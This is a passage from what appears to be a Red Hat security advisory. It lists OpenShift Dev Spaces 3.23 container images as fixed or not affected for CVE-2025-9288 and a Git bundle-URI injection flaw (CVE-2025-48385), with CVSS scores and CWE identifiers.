Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x	—	Vendor Fix fix Workaround

Known not affected 42 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le	—	Workaround

Threats

Impact Important

CVE-2025-9288

7.7 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H

CWE-20 - Improper Input Validation

Affected products

Fixed 12 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x	—	Vendor Fix fix Workaround

Known not affected 42 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le	—	Workaround

Threats

Impact Important

CVE-2025-48385

A bundled uri handling flaw was found in Git. When cloning a repository, Git knows to optionally fetch a bundle advertised by the remote server, which allows the server side to offload parts of the clone to a CDN. The Git client does not perform sufficient validation of the advertised bundles, which allows the remote side to perform protocol injection.

8.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L

CWE-88 - Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le	—	Vendor Fix fix Workaround

Known not affected 50 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64	—	Workaround
